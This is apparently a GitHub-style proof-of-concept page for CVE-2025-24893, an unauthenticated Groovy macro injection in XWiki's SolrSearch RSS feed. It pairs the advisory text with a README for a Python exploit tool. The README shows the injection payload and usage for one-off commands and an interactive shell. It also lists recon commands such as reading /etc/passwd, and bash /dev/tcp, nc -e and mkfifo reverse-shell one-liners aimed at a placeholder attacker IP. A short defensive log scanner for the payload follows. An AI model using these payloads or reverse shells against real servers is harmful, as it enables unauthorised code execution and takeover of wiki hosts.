CVE-2025-24893 PoC — Remote code execution as guest via SolrSearchMacros request in xwiki

Associated Vulnerability
Title: Remote code execution as guest via SolrSearchMacros request in xwiki (CVE-2025-24893)
Description: XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Any guest can perform arbitrary remote code execution through a request to `SolrSearch`. This impacts the confidentiality, integrity and availability of the whole XWiki installation. To reproduce on an instance, without being logged in, go to `<host>/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28"Hello%20from"%20%2B%20"%20search%20text%3A"%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20`. If there is an output, and the title of the RSS feed contains `Hello from search text:42`, then the instance is vulnerable. This vulnerability has been patched in XWiki 15.10.11, 16.4.1 and 16.5.0RC1. Users are advised to upgrade. Users unable to upgrade may edit `Main.SolrSearchMacros` in `SolrSearchMacros.xml` on line 955 to match the `rawResponse` macro in `macros.vm#L2824` with a content type of `application/xml`, instead of simply outputting the content of the feed.
Description
Unauthenticated Remote Code Execution in XWiki via SolrSearch Macro
Readme
# XWiki SSTI Exploit

A Python exploit for the XWiki Server-Side Template Injection (SSTI) vulnerability: unauthenticated Groovy macro injection through the `text` parameter of the SolrSearch RSS feed.

## Vulnerability

- **Type**: Server-Side Template Injection (SSTI)
- **Component**: XWiki SolrSearch RSS feed
- **Impact**: Remote Code Execution
- **Affected Version**: tested against XWiki 15.10.8; per the advisory, releases before 15.10.11, 16.4.1 and 16.5.0RC1 are affected

## Requirements

```bash
pip3 install requests beautifulsoup4
```

## Usage

### Test for Vulnerability
```bash
./xwiki_exploit.py -u http://target --test
```

### Execute Single Command
```bash
./xwiki_exploit.py -u http://target.com -c "whoami"
./xwiki_exploit.py -u http://target.com -c "id"
./xwiki_exploit.py -u http://target.com -c "ls -la /tmp"
```

### Interactive Shell
```bash
./xwiki_exploit.py -u http://target.com
```

This will give you an interactive pseudo-shell where you can run commands:
```
xwiki> whoami
xwiki
xwiki> pwd
/usr/lib/xwiki-jetty
xwiki> ls /home
oliver
xwiki> exit
```

### Debug Mode
```bash
./xwiki_exploit.py -u http://target.com -c "id" --debug
```

### Command-Line Options

- `-u, --url URL`: Target URL (required)
- `-c, --command CMD`: Execute single command
- `--test`: Test if target is vulnerable
- `--no-verify-ssl`: Disable SSL certificate verification
- `--debug`: Enable debug output

## Examples

**Information Gathering:**
```bash
./xwiki_exploit.py -u http://target.com -c "uname -a"
./xwiki_exploit.py -u http://target.com -c "cat /etc/os-release"
./xwiki_exploit.py -u http://target.com -c "cat /etc/passwd"
```

**Find Interesting Files:**
```bash
./xwiki_exploit.py -u http://target.com -c "find /home -type f -readable 2>/dev/null"
./xwiki_exploit.py -u http://target.com -c "ls -la /var/lib/xwiki"
```

**Network Information:**
```bash
./xwiki_exploit.py -u http://target.com -c "ip addr"
./xwiki_exploit.py -u http://target.com -c "netstat -tulpn"
```

**Establish Reverse Shell:**
```bash
# On attacker machine, start listener:
nc -lvnp 1337

# From exploit (try different methods):
./xwiki_exploit.py -u http://target.com -c "bash -c 'bash -i >& /dev/tcp/IP/1337 0>&1'"
./xwiki_exploit.py -u http://target.com -c "nc -e /bin/sh IP 1337"
./xwiki_exploit.py -u http://target.com -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP 1337 >/tmp/f"
```

## Technical Details

### Payload Structure

The exploit uses the following SSTI payload structure:
```
}}}{{async async=false}}{{groovy}}println("COMMAND".execute().text){{/groovy}}{{/async}}
```

### Exploitation Flow

1. The payload is URL-encoded and sent as the `text` parameter of the SolrSearch RSS feed (this tool uses the `view` action; the advisory's PoC uses `get` on the same page):
   ```
   /xwiki/bin/view/Main/SolrSearch?media=rss&text=[PAYLOAD]
   ```

2. The server processes the Groovy template and executes the command

3. The output is captured from the RSS feed response in the format:
   ```
   search on [}}OUTPUT]
   ```

4. The exploit parses the response body with BeautifulSoup and extracts the command output from the feed title

## Notes

- On the instance this was tested against, commands run as the `xwiki` user (uid=997); the account depends on how the target was deployed
- Working directory on that instance is `/usr/lib/xwiki-jetty`
- Some commands may not produce output if they fail or run in the background
- For complex commands, consider using shell scripts or base64 encoding
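Defenders will want the mirror image of the request shape described under Exploitation Flow: a scanner over web-server access logs that URL-decodes the `text` parameter of SolrSearch requests and flags wiki-macro syntax in it. This is an added example, not part of the tool on this page; the log lines are constructed in combined log format, and the set of macro names it looks for is this example's own choice.

```python
#!/usr/bin/env python3
"""Flag SolrSearch requests whose text parameter carries wiki-macro syntax.

Added example, not part of the original tool. The sample log lines are
constructed in Apache/Jetty combined format, not real traffic.
"""
import re
import urllib.parse

SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2025:12:00:01 +0000] "GET /xwiki/bin/view/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22id%22.execute%28%29.text%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D HTTP/1.1" 200 1337
10.0.0.6 - - [10/Mar/2025:12:00:02 +0000] "GET /xwiki/bin/view/Main/SolrSearch?media=rss&text=release+notes HTTP/1.1" 200 4120
10.0.0.7 - - [10/Mar/2025:12:00:03 +0000] "GET /xwiki/bin/get/Main/SolrSearch?text=%7B%7Bgroovy%7D%7D HTTP/1.1" 200 900
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Macro start tags that reach script execution when the text is rendered.
# {{/groovy}} is deliberately not matched; one hit per opening tag is enough.
MACRO_RE = re.compile(r"\{\{\s*(groovy|async|velocity|python|script)\b", re.IGNORECASE)


def classify(line: str):
    """Return a finding dict for a suspicious SolrSearch request, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    target = urllib.parse.urlsplit(m.group("target"))
    if not target.path.endswith("/SolrSearch"):
        return None
    params = urllib.parse.parse_qs(target.query, keep_blank_values=True)
    text = " ".join(params.get("text", []))
    # parse_qs decodes once; decode again so a double-encoded payload is still seen
    # (this may turn a literal '+' in a benign search into a space, which is harmless here).
    macros = sorted({x.lower() for x in MACRO_RE.findall(urllib.parse.unquote_plus(text))})
    if not macros:
        return None
    return {
        "client": line.split(" ", 1)[0],
        "path": target.path,
        "rss": params.get("media", [""])[0] == "rss",   # the vulnerable feed path
        "macros": macros,
        "text": text,
    }


def scan(log_text: str):
    """Apply classify() to every line and keep the findings, in log order."""
    return [f for f in (classify(l) for l in log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["client"], finding["path"], "rss" if finding["rss"] else "-",
              ",".join(finding["macros"]))
```

Of the three constructed lines, the first is the exploit shape from this README (flagged, `rss` true, macros `async` and `groovy`), the second is an ordinary search (not flagged), and the third injects `{{groovy}}` without `media=rss` (flagged, `rss` false); treat the `rss` flag as the high-confidence signal and the rest as worth a look.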

## Disclaimer

This tool is for educational and authorized penetration testing purposes only. Only use it on systems you have permission to test.
File Snapshot

[4.0K] /data/pocs/bbb5cd99cd36d864cfcf5492c8f61547db1fc06e
├── [3.2K] README.md
└── [7.3K] xwiki_exploit.py

1 directory, 2 files